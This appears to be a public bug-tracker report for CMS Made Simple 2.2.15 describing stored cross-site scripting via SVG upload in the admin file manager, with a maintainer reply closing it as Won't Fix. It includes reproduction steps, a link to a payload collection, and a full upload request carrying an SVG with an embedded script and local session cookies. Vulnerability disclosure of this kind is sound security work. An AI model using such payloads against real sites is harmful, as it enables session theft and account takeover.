CMS MADE SIMPLE FORGE

CMS Made Simple Core

 

[#12393] XSS via SVG file upload

avatar
Created By: Eshan Singh (r0x4r)
Date Submitted: Fri Dec 04 04:48:54 -0500 2020

Assigned To:
Version: 2.2.15
CMSMS Version: 2.2.15
Severity: Major
Resolution: Won't Fix
State: Open
Summary:
XSS via SVG file upload
Detailed Description:
Affected software: CMS Made Simple version 2.2.15 (cmsms)

I want to report a critical xss which I found on cmsms.

Description: SVG files can contain Javascript in <script> tags.
Browsers are smart enough to ignore scripts embedded in SVG files
included via IMG tags. However, a direct request for a SVG file will
result in the scripts being executed.

So an embedded SVG as an attachment in an issue or avatar does not
execute the code, but if a user clicks on the attachment the code will
execute.

Steps to reproduce

+ Login into the cmsms admin panel using the admin user.
+ then go to content > file manager > images, now upload the malicious svg
(https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/Files/SVG_XSS.svg)
file.
+ now open the svg file location
(http://127.0.0.1/cmsms/uploads//images/SVG_XSS.svg) and BOOM! you got the
popup.

Burp Request

POST /cmsms/admin/moduleinterface.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101
Firefox/83.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data;
boundary=---------------------------379224531139948695983200896304
Content-Length: 1040
Origin: http://127.0.0.1
Connection: close
Cookie:
a3c9a2f9998cdfdc410fef5f094579cb8f2f3306=c36ffe152373337eee92ec4985172db8528361bf%3A%3AeyJ1aWQiOjEsInVzZXJuYW1lIjoicjB4NHIiLCJlZmZfdWlkIjpudWxsLCJlZmZfdXNlcm5hbWUiOm51bGwsImhhc2giOiIkMnkkMTAkbElVM2FsR2l6UkR0dG5ROHJPVVwvd3V3M3hXano1M0wzYW9pVUhxT2pWQW4xaHNPNjZDLm9HIn0%3D;
__c=3d8ee0fbb464e874e82; CMSSESSID5d26ee9cb371=b1gen2isn6vf4g1sal7jdt5upv

-----------------------------379224531139948695983200896304
Content-Disposition: form-data; name="mact"

FileManager,m1_,upload,0
-----------------------------379224531139948695983200896304
Content-Disposition: form-data; name="__c"

3d8ee0fbb464e874e82
-----------------------------379224531139948695983200896304
Content-Disposition: form-data; name="disable_buffer"

1
-----------------------------379224531139948695983200896304
Content-Disposition: form-data; name="m1_files[]"; filename="evilsvgfile.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"
stroke="#004400"/>
   <script type="text/javascript">
      alert('This app is probably vulnerable to XSS attacks!');
   </script>
</svg>
-----------------------------379224531139948695983200896304--


Impact :An Adversary can carry out XSS attack and also can take the cookie of
the Admin and login through Admin Account.
Also, an adversary can manage to login through any other users account with
valid session cookies

Thanks and regards,
Eshan Singh



History

Comments
avatar
Date: 2020-12-04 10:36
Posted By: Matt Hornsby (DIGI3) (DIGI3)

The admin section is for trusted users only. If you need a login system for
untrusted users, there are third-party modules available. If you feel you need
to protect against certain file types, this is best done using .htaccess or
other server-level security methods.

Please read
https://www.cmsmadesimple.org/community/get-involved/report-a-vulnerability for
more clarification on our position.
      
Updates

Updated: 2020-12-04 10:37
resolution_id: 10 => 8

Updated: 2020-12-04 05:06
resolution_id: => 10